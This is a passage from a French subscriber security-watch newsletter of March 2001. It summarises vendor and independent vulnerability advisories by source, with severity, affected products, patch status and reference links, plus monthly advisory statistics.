La seconde alternative, pour séduisante quelle soit, ne peut être raisonnablement mise en œuvre étant
donné l’actuelle diversité des systèmes impactés. En conséquence, nous nous proposons de maintenir une
synthèse des avis classée par organisme émetteur de l’avis.
Afin de faciliter la lecture de ceux-ci, nous proposons un guide de lecture sous la forme d'un synoptique
résumant les caractéristiques de chacun des sources d’information ainsi que les relations existant entre ces
sources. Seules les organismes, constructeurs ou éditeurs, disposant d’un service de notification officiel et
publiquement accessible sont représentés.
Avis Spécifiques
Constructeurs
Réseaux
3Com
Cisco
Systèmes
Avis Généraux
Editeurs
Systèmes
Compaq
Indépendants
Editeurs
Linux
Hackers
Microsoft
HP
FreeBSD
IBM
NetBSD
SGI
OpenBSD
SUN
SCO
l0pht
Netscape
rootshell
Editeurs
Organismes
Autres
US
Autres
Aus-CERT
AXENT
BugTraq
CERT
ISS
@Stake
CIAC
Typologies des informations publiées
Publication de techniques et de programmes d’attaques
Détails des alertes, techniques et programmes
Synthèses générales, pointeurs sur les sites spécifiques
Notifications détaillées et correctifs techniques
L’analyse des avis peut être ainsi menée selon les trois stratégies suivantes :
Recherche d’informations générales et de tendances :
Lecture des avis du CERT et du CIAC
Maintenance des systèmes :
Lecture des avis constructeurs associés
Compréhension et anticipation des menaces :
Lecture des avis des groupes indépendants
Aus-CERT
CERT
3Com
Compaq
Microsoft
BugTraq
rootshell
AXENT
NetBSD
Cisco
HP
Netscape
@Stake
l0pht
ISS
OpenBSD
IBM
Xfree86
SGI
Linux
SUN
FreeBSD
CIAC
Veille Technologique Sécurité N°32
© APOGEE Communications - Tous droits réservés
Page 26/51
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mars 2001
FORMAT DE LA PRÉSENTATION
Les alertes et informations sont présentées classées par sources puis par niveau de gravité sous la forme
de tableaux récapitulatifs constitués comme suit:
Présentation des Alertes
EDITEUR
TITRE
Description sommaire
Gravité
Date Informations concernant la plate-forme impactée
Produit visé par la vulnérabilité Description rapide de la source du problème
Correction
URL pointant sur la source la plus pertinente
Référence
Présentation des Informations
SOURCE
TITRE
Description sommaire
URL pointant sur la source d'information
SYNTHESE MENSUELLE
Le tableau suivant propose un récapitulatif du nombre d’avis publiés pour la période courante, l’année en
cours et l’année précédente. Ces informations sont mises à jour à la fin de chaque période de veille.
L’attention du lecteur est attirée sur le fait que certains avis sont repris et rediffusés par les différents
organismes. Ces chiffres ne sont donc représentatifs qu’en terme de tendance et d’évolution.
Période du 23/02/2001 au 23/03/2001
Période
Organisme
16
CERT-CA
1
CERT-IN
1
CIAC
14
Constructeurs
12
Cisco
4
HP
6
IBM
2
SGI
0
Sun
0
Editeurs
6
Allaire
0
Microsoft
5
Netscape
1
Sco
0
Unix libres
39
Linux RedHat
7
Linux Debian
16
Linux Mandr.
11
FreeBSD
5
Autres
5
@Stake
3
Safer
0
X-Force
2
Cumul
2001 2000
41
118
4
22
2
10
35
86
26
77
5
13
14
28
5
17
0
12
2
7
21
155
2
32
17
100
1
7
1
16
115
226
17
137
36
66
34
-28
23
16
38
8
10
4
1
4
27
Veille Technologique Sécurité N°32
© APOGEE Communications - Tous droits réservés
Cumul 2001 - Constructeurs
SGI Sun
0% 8%
IBM
19%
Sun
9%
IBM
22%
Cumul 2001 - Editeurs
Microsoft
80%
SGI
16%
Cisco
19%
HP
54%
Netscape
5%
Cumul 2000 - Constructeurs
Sco Allaire
5% 10%
Cisco
17%
HP
36%
Cumul 2000 - Editeurs
Netscape
5%
Sco
10%
Allaire
21%
Microsoft
64%
Page 27/51
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mars 2001
ALERTES DÉTAILLÉES
AVIS OFFICIELS
Les tables suivantes présentent une synthèse des principales alertes de sécurité émises par un organisme
fiable, par l’éditeur du produit ou par le constructeur de l’équipement. Ces informations peuvent être
considérées comme fiables et authentifiées. En conséquence, les correctifs proposés, s'il y en a, doivent
immédiatement être appliqués.
CIAC
Alerte virus 'The+Naked+Wife' (W32.Naked@mm)
Un nouveau Cheval de Troie sévit actuellement sur l'Internet en se propageant via 'Outlook'.
Forte
06/03 Windows 95, 98, NT, ME et 2000 avec Outlook.
Propagation du virus lors de l'exécution
Correctif existant Virus 'The+Naked+Wife'
http://www.nipc.gov/warnings/advisories/2001/01-002.htm
NIPC [01-002]
http://www.ciac.org/ciac/bulletins/l-056.shtml
CIAC [L-056]
http://service1.symantec.com/sarc/sarc.nsf/html/[email protected]
Symantec
http://www.finjan.com/attack_release_detail.cfm?attack_release_id=48
Finjan
http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=TROJ_NAKEDWIFE
Trend Micro
http://vil.nai.com/vil/virusSummary.asp?virus_k=99035
NAI / McAfee
http://www.data-fellows.com/v-descs/nakedwif.shtml
F-Secure
http://www.sophos.com/virusinfo/analyses/w32naked.html
Sophos
http://ca.com/press/2001/03/nakedwife_trojan_virus.htm
CA
CISCO
Vulnérabilité dans 'Cisco IOS'
Un défaut dans 'Cisco IOS' permet de voir ou de modifier sans autorisation un nombre limité d'objets 'SNMP' à
l'aide d'un nom de communauté 'ILMI' (Interim Local Management Interface) non documenté.
Forte
27/02 Cisco IOS Software versions 11.x et 12.0
Utilisation d'un nom de communauté 'ILMI' non documenté
Correctif existant Requête 'SNMP'
http://www.cisco.com/warp/public/707/ios-snmp-ilmi-vuln-pub.shtml
CSCdp11863
Vulnérabilités dans 'Cisco IOS' et 'Cisco CatOS'
Plusieurs vulnérabilités présentes dans 'Cisco IOS' et 'Cisco CatOS' peuvent compromettre la configuration des
interfaces.
Forte
28/02 Cisco IOS Software versions 11.x, 12.0 - Cisco CatOS Software 5.4, 5.5 et 6.1
Accès aux variables contenues dans la 'MIB'
Correctif existant Protocole 'SNMP'
http://www.cisco.com/warp/public/707/ios-snmp-community-vulns-pub.shtml
Multiples
Accès aux 'Cisco Aironet 340' via l'interface web
Il est possible de visualiser et de modifier la configuration des ponts 'Cisco Aironet 340' via l'interface web.
Forte
07/03 Aironet AP4500, AP4800, BR100, BR500 - Aironet AIR-BR340 en V7.x, 8.07 ou 8.24
Accès non restreint
Correctif existant Interface WEB
http://www.cisco.com/warp/public/707/Aironet340-pub.shtml
CSCdt52783
Prédiction des numéros de séquence TCP sur 'Cisco IOS'
La prédiction des numéros de séquence TCP sur 'Cisco IOS' peut mettre en défaut le contenu des paquets d'une
connexion TCP.
Moyenne 28/02 Tous les produits utilisant 'Cisco IOS'
Numéro de séquence prédictible
Correctif existant Pile TCP/IP
http://www.cisco.com/warp/public/707/ios-tcp-isn-random-pub.shtml
CSCds04747
COMPAQ
Trafic non sécurisé dans 'Compaq Management Agents'
Les ports utilisés par les agents 'web-enabled' utilisés par 'Compaq Management Agents' peuvent être accédés à
distance sans contrôle.
Critique 21/03 Windows 9x, NT, 2000 - NetWare
Correctif existant
SSRT0715
SCO Open Server 5, UnixWare 7 - RedHat 6.2 et 7.0
Tru64 UNIX V4.0f, 4.0g, 5.0, 5.0a, 5.1 , OpenVMS et Produits de stockage Compaq
Agents 'web-enabled'
Trafic via les ports TCP 2301 et 280
http://www.compaq.com/products/servers/management/mgtsw-advisory.html
Veille Technologique Sécurité N°32
© APOGEE Communications - Tous droits réservés
Page 28/51
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mars 2001
Déni de service dans 'inetd'
Une vulnérabilité affecte le service 'inetd'.
Moyenne 23/02 Compaq's Tru64 UNIX version 5.1 (tous niveaux de patch)
Non disponible
Correctif existant Démon 'inetd'
http://ftp.support.compaq.com/patches/public/Readmes/unix/ssrt0708u.html
SSRT0708U
FreeBSD
Déni de service dans 'timed'
Le démon 'timed' est sensible à une vulnérabilité de type déni de service exploitable à distance.
Moyenne 12/03 FreeBSD 3.x, 4.x
Mauvais traitement des paquets malformés
Correctif existant 'timed'
FreeBSD-SA01:28 http://www.freebsd.org/security/security.html#adv
Déni de service dans 'rwhod'
Le démon 'rwhod' est sensible à une vulnérabilité de type déni de service exploitable à distance.
Moyenne 12/03 FreeBSD 3.x, 4.x
Mauvais traitement des paquets malformés
Correctif existant 'rwhod'
FreeBSD-SA01:29 http://www.freebsd.org/security/security.html#adv
Vulnérabilité dans le module 'ufs/ext2fs'
Une vulnérabilité dans le module 'ufs/ext2fs' permet d'accéder en lecture aux fichiers effacés.
Moyenne 22/03 FreeBSD versions 3.x, 4.x
Non positionnement à zéro des fichiers effacés
Correctif existant 'ufs/ext2fs'
FreeBSD-SA01:30 http://www.freebsd.org/security/security.html#adv
Existence d'une ancienne vulnérabilité dans 'sunrpc'
Une vulnérabilité, découverte en 1998, semble encore être d'actualité. Elle affecte 'sunrpc' de FreeBSD.
Moyenne 28/02 Testé sur FreeBSD 4.2
Débordement de buffer
Correctif existant Code sunrpc de FreeBSD 'libc'
http://www.linuxsecurity.com/advisories/freebsd_advisory-1178.html
Linux Security
HP
Correctifs contre les vulnérabilités affectant 'BIND'
Plusieurs vulnérabilités exploitables à distance affectent 'BIND'.
Critique 01/03 HP-UX versions 11.11, 11.00, 11.04, 10.20, 10.24, 10.10 et 10.01 sur HP9000 server et workstation.
Débordement de buffer
Correctif existant 'BIND'
HPSBUX0102-144 http://europe-support.external.hp.com/
Débordement de buffer dans 'crontab'
Il existe un débordement de buffer exploitable localement dans 'crontab'.
Forte
18/03 HP-UX versions 11.00, 11.04, 10.20, 10.24, 10.10 et 10.01 sous HP9000 séries 700 et 800
Débordement de buffer
Correctif existant 'crontab'
HPSBUX0103-146 http://europe-support.external.hp.com/
Vulnérabilité dans MPE/iX 'AIF'
Il existe une faille de sécurité dans 'AIF'
Forte
12/03 MPE/iX versions 5.5 et supérieures sur HP3000
Non disponible
Correctif existant Architected Interface Facility
HPSBMP0103-011 http://europe-support2.external.hp.com/
Vulnérabilité dans 'HP OpenView OmniBack'
Une vulnérabilité dans 'HP OpenView OmniBack' permet d'obtenir un interpréteur de commandes 'administrateur' à
distance.
Forte
28/02 Windows NT 4.0, 2000 et systèmes HP-UX utilisant OmniBack versions 3.00 ou supérieures
Non disponible
Correctif existant HP OpenView OmniBack
HPSBUX0102-142 http://europe-support.external.hp.com/
Vulnérabilité dans 'SD-UX'
Une faille de sécurité affecte localement HP Software Distributor 'SD-UX'.
Forte
28/02 HP-UX releases 10.01, 10.10, 10.20 et 11.00 sur HP9000 séries 700/800.
Non disponible
Correctif existant Software Distributor 'SD-UX'
HPSBUX0102-143 http://europe-support.external.hp.com/
Déni de service dans 'asecure'
Il existe une vulnérabilité de type déni de service dans 'asecure'.
Moyenne 07/03 HP-UX versions 10.01, 10.10, 10.20 et 11.00 sur HP9000 séries 700/800
Mauvaises permissions de fichiers
Correctif existant 'asecure'
HPSBUX0103-145 http://europe-support2.external.hp.com/
Veille Technologique Sécurité N°32
© APOGEE Communications - Tous droits réservés
Page 29/51
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mars 2001
IBM
Mots de passe de 'NetCommerce' déchiffrés
Un outil de déchiffrement permet de révéler les mots de passe 'NetCommerce'.
NetCommerce Hosting Server V 3.1.1, 3.1.2 et 3.2
Critique 07/03 NetCommerce V 3.1, 3.1.1, 3.1.2 et 3.2
Aucun correctif
IBM WCS 2001-1
IBM WCS 2001-2
WebSphere Commerce Suite V 4.1 et 4.1.1
WebSphere Commerce Suite (Service Provider Edition) V3.2
Websphere Commerce Suite (Market Place Edition) V 4.1
Outil 'SUQ.DIQ version 1.00'
Déchiffrement de mot de passe
http://www-4.ibm.com/software/webservers/commerce/servers/2001-1.htm
http://www-4.ibm.com/software/webservers/commerce/servers/2001-2.htm
IMAPD
Débordement de buffer dans 'imapd'
Il est possible de provoquer à distance un débordement de buffer dans le démon 'imapd'.
Forte
21/02 IMAP4rev1 v12.261, v12.264 et 2000.284. D'autres versions non testées sont probablement affectées.
Correctif existant
Les distributions suivantes ont un démon vulnérable: Slackware 7.0, 7.1 - RedHat 6.2 - Zoot - Conectiva 6.0
Commande 'lsub'
Débordement de buffer
bufferoverflow.org
http://www.bufferoverflow.org/noticias.php?id=35
ISS
Déni de service dans 'RealSecure Network Sensor'
Il est possible de provoquer à distance un déni de service dans 'RealSecure Network Sensor'.
Critique 12/03 ISS RealSecure Network Sensor (versions inférieures à la 5.0 MicroUpdate 1.2)
'Network Sensor'
Flood d'attaques (attaques en masse)
Aucun correctif
http://www.checkpoint.com/techsupport/alerts/rsdos.html
Checkpoint
LINUX
Débordement de buffer dans 'ePerl'
Plusieurs débordement de buffer exploitables localement et à distance existent dans 'eperl'.
Forte
08/03 Linux Debian 2.2 - Linux Mandrake 7.1, 7.2 et Corporate Server 1.0.1
Débordement de buffer
Correctif existant 'eperl'
http://lists.debian.org/debian-security-announce-01/msg00031.html
DSA-034-1
MDKSA-2001:027 http://www.linux-mandrake.com/en/security/2001/MDKSA-2001-027.php3
Vulnérabilité dans le paquetage 'mutt'
Un bug de formatage de chaînes de caractères, exploitable localement, est présent dans 'mutt'.
Moyenne 15/03 Immunix OS 6.2, 7.0-beta, 7.0 - Red Hat 5.2, 6.2 et 7.0 - Mandrake 6.x, 7.x
Formatage de chaînes de caractères
Correctif existant 'mutt'
http://download.immunix.org/ImmunixOS/7.0/updates/IMNX-2001-70-006-01
2001-70-006-01
http://www.redhat.com/support/errata/RHSA-2001-029.html
RHSA-2001:029
Vulnérabilité de type symlink dans 'joe'
Une vulnérabilité de type symlink dans 'joe' peut localement amener un utilisateur à usurper l'identité d'un tiers.
Moyenne 03/03 Red Hat Linux 5.2, 6.2 et 7.0 - Debian 2.2 - Mandrake 6.x, 7.x
Chargement non sécurisé du fichier de configuration
Correctif existant 'joe'
http://lists.debian.org/debian-security-announce-01/msg00034.html
DSA-034-1
MDKSA-2001:026 http://www.linux-mandrake.com/en/security/2001/MDKSA-2001-026.php3
http://www.linuxsecurity.com/advisories/redhat_advisory-1182.html
RHSA-2001:024
Vulnérabilité dans le paquetage 'sgml-tools'
Une vulnérabilité de type lien symbolique est exploitable localement dans 'sgml-tools'.
Moyenne 08/03 Red Hat Linux 5.2, 6.2 et 7.0 - Debian 2.2 - Mandrake 6.x, 7.x
Suivi de lien symbolique dans '/tmp'
Correctif existant 'sgml-tools'
http://lists.debian.org/debian-security-announce-01/msg00035.html
DSA-038-1
MDKSA-2001:030 http://www.linux-mandrake.com/en/security/2001/MDKSA-2001-030.php3
http://www.linuxsecurity.com/advisories/redhat_advisory-1182.html
RHSA-2001:027
Vulnérabilités dans le paquetage 'licq'
Le paquetage 'licq' contient deux vulnérabilités exploitables à distance.
Moyenne 21/03 Linux Red Hat 7.0 - Mandrake
Débordement de buffer et Appel système non sécurisé
Correctif existant 'licq'
http://ciac.llnl.gov/ciac/bulletins/l-063.shtml
CIAC [L-063]
MDKSA-2001:032 http://www.linux-mandrake.com/en/security/2001/MDKSA-2001-032.php3
http://www.redhat.com/support/errata/RHSA-2001-022.html
RHSA-2001:022
Veille Technologique Sécurité N°32
© APOGEE Communications - Tous droits réservés
Page 30/51
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mars 2001
LINUX CALDERA
Débordement de buffer dans 'imap', 'ipop2d' et 'ipop3d'
Plusieurs débordement de buffer dans les paquetages 'imap' peuvent être exploités pour obtenir accès distant non
privilégié.
Forte
12/03 OpenLinux 2.3, 2.3.1 et eBuilder: versions antérieures à imap-4.6.BETA-2
Correctif existant
CSSA-2001-011.0
CLA-2001:388
Linux Security
OpenLinux eDesktop 2.4: versions antérieures à imap-4.7-2
Conectiva
'imap', 'ipop2d' et 'ipop3d'
Débordement de buffer et Défaut de configuration
http://www.caldera.com/support/security/advisories/CSSA-2001-011.0.txt
http://www.linuxsecurity.com/advisories/other_advisory-1228.html
http://www.linuxsecurity.com/advisories/caldera_advisory-1206.html
Débordement de buffer dans '/bin/mail'
Il existe un débordement de buffer exploitable localement dans '/bin/mail'.
Forte
03/03 OpenLinux 2.3, 2.3.1 et eBuilder: versions antérieures à mailx-8.1.1-12OL
Correctif existant
CSSA-2001-010.0
Linux Security
OpenLinux eDesktop 2.4: versions antérieures à mailx-8.1.1-12
'/bin/mail' (paquetage mailx)
Débordement de buffer
http://www.calderasystems.com/support/security/advisories/CSSA-2001-010.0.txt
http://www.linuxsecurity.com/advisories/caldera_advisory-1181.html
LINUX DEBIAN
Vulnérabilités dans 'proftpd'
Deux vulnérabilités existent dans 'proftpd'.
Forte
07/03 Linux Debian 2.2 (potato)
Erreur de configuration / Lien symbolique
Correctif existant 'proftpd'
http://lists.debian.org/debian-security-announce-01/msg00029.html
DSA-032-1
Déni de service dans 'man2html'
Un utilisateur peut provoquer à distance un déni de service sur 'man2html'.
Forte
07/03 Linux Debian 2.2 (toutes architectures)
Consommation des ressources mémoire
Correctif existant 'man2html'
http://lists.debian.org/debian-security-announce-01/msg00032.html
DSA-035-1
Usurpation d'identité dans 'mc' (Midnight Commander)
Il est possible d'exécuter localement un programme via le gestionnaire de fichiers 'mc' sous l'identité d'un tiers.
Moyenne 07/03 Linux Debian 2.2
Exécution non sécurisée de programmes
Correctif existant 'mc' (Midnight Commander)
http://lists.debian.org/debian-security-announce-01/msg00033.html
DSA-036-1
LINUX REDHAT
Débordement de buffer dans 'Secure Web Server'
Il existe un débordement de buffer dans Red Hat 'Secure Web Server'.
Forte
23/02 Red Hat Secure Web Server 2.0 (i386)
Débordement de buffer
Correctif existant Commande 'ALIAS'
http://www.linuxsecurity.com/advisories/redhat_advisory-1168.html
RHSA2001:017
LINUX SuSE
Vulnérabilités dans 'cups'
Plusieurs vulnérabilités sont exploitables à distance dans 'cups'.
Forte
06/03 Linux SuSE 7.1 (cups versions inférieures à 1.1.6)
Débordement de buffer
Correctif existant 'cups'
SUSE SA:2001:05 http://www.linuxsecurity.com/advisories/suse_advisory-1183.html
MICROSOFT
Noms de fichiers 'cachés' révélés dans 'IE'
Il est possible, sous certaines conditions, de connaître le nom donné aléatoirement à un fichier stocké dans le
cache, à distance, au travers d'une page web ou d'un e-mail.
Critique 06/03 Microsoft Internet Explorer 5.01 et 5.5
Divulgation des nom de fichiers 'cachés'
Correctif existant 'Internet Explorer'
http://www.microsoft.com/technet/security/bulletin/MS01-015.asp
MS01-015
Déni de service sur 'IIS 5.0' et 'Exchange 2000'
Il est possible de provoquer à distance un déni de service sur 'IIS 5.0' et 'Exchange 2000'.
Critique 16/03 Microsoft IIS 5.0M et Exchange 2000 Server utilisant les extension 'OWA'
Débordement de buffer dans les requêtes PROPFIND et SEARCH
Correctif existant WEBDAV
http://www.microsoft.com/technet/security/bulletin/MS01-016.asp
MS01-016
Guninski #38-s39 http://www.guninski.com/
Veille Technologique Sécurité N°32
© APOGEE Communications - Tous droits réservés
Page 31/51
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mars 2001
Emission par 'VeriSign' de faux certificats 'Microsoft'
VeriSign a émit deux certificats à une personne se faisant passer pour un employé de Microsoft, les 29 et 30 janvier
2001.
Forte
22/03 Microsoft Windows 95, 98, Me, NT 4.0 et 2000
Certificats 'VeriSign'
Usurpation de l'identité du détenteur des certificats
Aucun correctif
http://www.microsoft.com/technet/support/kb.asp?ID=293816
Microsoft KB
http://www.microsoft.com/technet/security/bulletin/MS01-017.asp
MS01-017
Débordement de buffer dans la visionneuse d'évènements
Il est possible de provoquer à distance un débordement de buffer lors de la visualisation d'événements dont la
journalisation a été spécialement formatée.
Forte
26/02 Windows 2000 toutes éditions
Débordement de buffer
Correctif existant Event Viewer
http://www.microsoft.com/technet/security/bulletin/MS01-013.asp
MS01-013
Déni de service sur 'IIS 5.0' et 'Exchange 2000'
Il est possible de provoquer à distance un déni de service sur 'IIS 5.0' et 'Exchange 2000'
Forte
01/03 Microsoft IIS 5.0 et 2000
Correctif existant Analyseur syntaxique des URLs Mauvais traitement de certaines URLs
http://www.microsoft.com/technet/security/bulletin/MS01-014.asp
MS01-014
MICROSOFT / NIPC
Alerte aux vulnérabilités liées à l'e-commerce
Le NIPC (National Infrastructure Protection Center) publie un avis rappelant les vulnérabilités utilisées dans les
récentes attaques de site d'e-commerce et d'e-banking.
2 - Microsoft SQL Server 7.0
Critique
08/03 1 - Microsoft IIS 3.0 et 4.0, MDAC version 1.5
Correctif existant
NIPC [01-003]
Microsoft
3 - Microsoft Windows NT 4.0
4 - Microsoft IIS 5.0
1 - Méthodes d'accès non sécurisées
1 - Objet RDS MDAC
2 - Mauvaise vérification des paramètres
2 - SQL Server MSDE
3 - Permissions laxistes
3 - Base de registre
4 - Acceptation d'URL impropres
4 - Traitement des URL
http://www.nipc.gov/warnings/advisories/2001/01-003.htm
http://www.microsoft.com/technet/security/nipc.asp
MIT/KERBEROS
Vulnérabilité dans 'Kerberos 4' et versions dérivées
Une vulnérabilité de type lien symbolique exploitable localement existe dans les implémentations de 'Kerberos 4' du
MIT et ses dérivées.
Critique 07/03 MIT Kerberos 5 : versions antérieures à krb5-1.2.2-beta1
Correctif existant
MIT
MIT Kerberos 4 :
patch 10 et versions antérieures
Cygnus Kerberos: Kerbnet et Cygnus Network Security
et certaines versions de kth-krb
Bibliothèque 'krb4'
Suivi de lien symbolique dans '/tmp'
http://web.mit.edu/kerberos/www/advisories/krb4tkt.txt
NETSCAPE
Débordement de buffer dans 'Netscape Directory Server'
Un utilisateur distant peut provoquer un débordement de buffer dans 'Netscape Directory Server'.
Critique 07/03 Netscape Directory Server 4.1 et Netscape Messaging Server Netscape Directory Server 4.12
Débordement de buffer dans 'escape_string_with_punctuation()'
Correctif existant NDS
http://www.atstake.com/research/advisories/2001/index.html#030701-1
@stake
NORTEL
Chiffrement '3DES'
Nortel Networks 'CES' (Contivity Extranet Switch) utilise un simple DES lors de l'initialisation IPSEC
Moyen
28/02 Extranet Access Client versions 2.5x et 2.6x. (la version 2.62 est immune, ainsi que CES 3.50)
Correctif existant Processus de chiffrement '3DES' Politique de gestion du premier échange
http://www.securityfocus.com/archive/1/165541
Bugtraq
http://www.securityfocus.com/archive/1/165812
NORTEL
OpenBSD
Débordement de buffer dans le traitement des options 'IPSEC'
Un débordement de buffer dans le traitement des options 'IPSEC' peut provoquer à distance un déni de service.
Forte
02/03 OpenBSD 2.8 (toutes architectures)
Débordement de buffer
Correctif existant Code source
http://www.openbsd.org/errata.html#ipsec_ah
OpenBSD
Veille Technologique Sécurité N°32
© APOGEE Communications - Tous droits réservés
Page 32/51
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mars 2001
Vulnérabilité dans la création d'historiques
Une vulnérabilité dans la création de fichiers rend accessibles ces derniers en lecture et en écriture.
Moyenne 18/03 OpenBSD 2.8 (toutes architectures)
Mauvais positionnement des permissions ('umask')
Correctif existant Librarie 'readline' (history.c)
http://www.openbsd.org/errata.html#readline
OpenBSD [024]
Palm OS
Porte dérobée sur les organiseurs utilisant 'Palm OS'
Il existe un mode 'debug' pouvant servir de porte dérobée sur les organiseurs utilisant Palm OS.
Forte
01/03 Palm OS versions 3.5.2 et inférieures
Palm OS
Activation non sécurisée du mode 'debug'
Aucun correctif
Http://www.atstake.com/research/advisories/2001/index.html#030101-1
@Stake
SSH
Déni de service dans 'sshd'
Il existe une vulnérabilité exploitable à distance dans 'SSH' 2.4 pour Windows pouvant mener un utilisateur à
provoquer un déni de service.
Forte
16/03 SSH Secure Shell versions 2.4 pour Windows Server
Code source 'ssheloop.c'
Limitation à 64 connexions simultanées
Aucun correctif
[USSR-2001001] http://www.ussrback.com/USSR-2001001.html
VIRUS / VERS
Forte activité du ver 'lion' actuellement constatée
Le SANS Institute émet une alerte concernant la forte activité du ver 'lion', un dérivé du ver 'ramen'.
Critique 23/03 Plate-forme Linux utilisant une version BIND 8.2,8.2-P1, 8.2.1, 8.2.2-Px et toutes les version 8.2.3 beta.
Exploitation de la vulnérabilité bind 'TSIG'
Correctif existant Ver 'lion'
http://www.sans.org/y2k/lion.htm
SANS GIAC
Diffusion du virus 'W32/Magistr'
Le virus W32/Magistr apparu ces derniers jours fait l'objet de l'alerte AusCERT AL-2001.03.
Forte
15/03 Toute plate-forme Microsoft Windows
Exécution du virus
Correctif existant Virus
http://www.symantec.com/avcenter/venc/data/[email protected]
Symantec
http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=PE_MAGISTR.A
Trend Micro
http://www.europe.f-secure.com/v-descs/magistr.shtml
F-Secure
http://www.sophos.com/virusinfo/analyses/w32mag.html
Sophos
http://ca.com/virusinfo/encyclopedia/descriptions/magistr24876.htm
CA
ftp://ftp.auscert.org.au/pub/auscert/advisory/AL-2001.03
AL-2001.03
ZOPE
Disponibilité des nouveaux paquetages 'zope'
De nouveaux paquetages 'zope' sont disponibles. Ils corrigent plusieurs failles de sécurité.
Forte
27/02 Zope version 2.3.1 b1 et inférieures
Mauvaise assignation de classes
Correctif existant 'Zope'
http://www.zope.org/Products/Zope/Hotfix_2001-02-23/security_alert
Zope
ALERTES NON CONFIRMEES
Les alertes présentées dans les tables de synthèse suivantes ont été publiées dans diverses listes
d’information mais n’ont pas encore fait l’objet d’une annonce ou d'un correctif de la part de l'éditeur. Ces
alertes nécessitent la mise en place d’un processus de suivi et d’observation.
CGI/PERL
Vulnérabilité dans le script 'FormMail.pl'
Le script CGI 'FormMail.pl' peut être utilisé à des fins illicites.
Moyenne 12/03 FormMail.pl
Script 'FormMail.pl'
Non vérification des données passées en paramètre
Aucun correctif
Bugtraq
http://www.securityfocus.com/archive/1/168177
DGUX
Débordement de buffer dans 'lpsched'
Un débordement de buffer, exploitable localement, est présent dans 'lpsched'.
Forte
22/03 DGUX versions R4.20MU06 et MU02 (architecture 32 bits)
'lpsched'
Débordement de buffer
Aucun correctif
http://www.securiteam.com/unixfocus/DGUX_lpsched_Buffer_Overflow.html
Securiteam
Veille Technologique Sécurité N°32
© APOGEE Communications - Tous droits réservés
Page 33/51
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mars 2001
FTP
Déni de service sur plusieurs serveurs 'ftp'
En soumettant une commande spéciale, il est possible de provoquer à distance un déni de service sur une majorité
des serveurs ftp.
Forte
16/03 Proftpd, NetBSD FTP, Microsoft FTP Service (Version 5.0)
Commande 'ls'
Mauvais traitement des paramètres
Aucun correctif
http://www.securityfocus.com/archive/1/169069
Bugtraq
MICROSOFT
Vulnérabilité dans 'Personal Web Server' (PWS)
Une vulnérabilité exploitant le bug unicode sur Microsoft 'Personal Web Server' permet l'exécution de code à
distance sur la machine cible.
Forte
18/03 Microsoft Personal Web Server
Bug 'unicode'
Mauvais traitement des URLs
Aucun correctif
http://www.securityfocus.com/archive/1/169832
Bugtraq
NETSCAPE
Déni de service sur 'Netscape Collabra'
Il est possible de provoquer un déni de service, à distance, sur les serveurs 'Netscape Collabra'.
Moyenne 27/02 Netscape Collabra Server version 3.54 pour Windows NT
Port TCP 5238
Mauvais traitement des données
Aucun correctif
http://www.securityfocus.com/archive/1/165516
Bugtraq
MYSQL
Vulnérabilité dans le démon 'mysqld'
Une vulnérabilité existe dans le démon 'mysqld' et peut être exploitée localement.
Forte
18/03 Tests effectuées sur mysql-3.20.32a (d'autres versions sont probablement vulnérables)
'mysql'
Ouverture non sécurisée de certains fichiers
Aucun correctif
http://www.securityfocus.com/archive/1/169873
Bugtraq
NOVELL
Vulnérabilité dans 'Novell Netware'
Une vulnérabilité exploitable à distance dans 'Novell Netware' permet de se connecter sans mot de passe.
Forte
09/03 Novell Netware 3.1-5.1
Serveur d'impression Novell
Absence de mot de passe
Aucun correctif
http://www.securityfocus.com/bid/2446
Bugtraq
QUALCOMM
Vulnérabilité dans 'Eudora' 5.02 Sponsored Mode
Il est possible de provoquer l'installation d'un exécutable sous 'Eudora' version 5.2 par un simple envoi de courrier
électronique.
Critique
18/03 Eudora 5.02 Sponsored Mode
Options spécifiques
Enregistrement automatique des attachements via 'use Microsoft viewer' et
Aucun correctif
Bugtraq
'allow executables in HTML content'
http://www.securityfocus.com/archive/1/169858
http://www.securityfocus.com/archive/1/170370
http://www.securityfocus.com/archive/1/170387
SUN
Débordement de buffer dans 'snmpXdmid'
Il est possible de provoquer à distance un débordement de buffer dans le démon 'snmpXdmid' chargé de combiner
'SNMP' et 'DMI'.
Critique 15/03 Sun Solaris 8 sun4uLe démon est livré avec Sun Solaris versions 2.6, 7 et 8
Démon 'snmpXdmid'
Débordement de buffer
Aucun correctif
http://www.securityfocus.com/archive/1/168936
Bugtraq
Débordement de buffer dans 'snmpd'
La commande '/opt/SUNWssp/snmpd' est vulnérable à un débordement de buffer exploitable localement.
Forte
13/03 Sun SunOS 5.8
Service '/opt/SUNWssp/snmpd'
Débordement de buffer
Aucun correctif
http://www.securiteam.com/unixfocus/Solaris_5_8_snmpd_Vulnerability.html
Securiteam
Veille Technologique Sécurité N°32
© APOGEE Communications - Tous droits réservés
Page 34/51
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mars 2001
AUTRES INFORMATIONS
REPRISES D'AVIS
ET
CORRECTIFS
Les vulnérabilités suivantes, déjà publiées, ont été mises à jour, reprises par un autre organisme, ou ont
données lieu à la fourniture d'un correctif:
CIAC
Reprise de l'avis Red Hat RHSA-2001:029-02
Le CIAC a repris, sous la référence L-060, l'avis Red Hat RHSA-2001:029-02 concernant la vulnérabilité dans le
paquetage 'mutt'.
http://ciac.llnl.gov/ciac/bulletins/l-060.shtml
Reprise de l'avis Microsoft MS01-015
Le CIAC a repris, sous la référence L-061, l'avis Microsoft MS01-015 concernant le manque de sécurité d'Internet
Explorer.
http://ciac.llnl.gov/ciac/bulletins/l-061.shtml
Reprise de l'avis Microsoft MS01-017
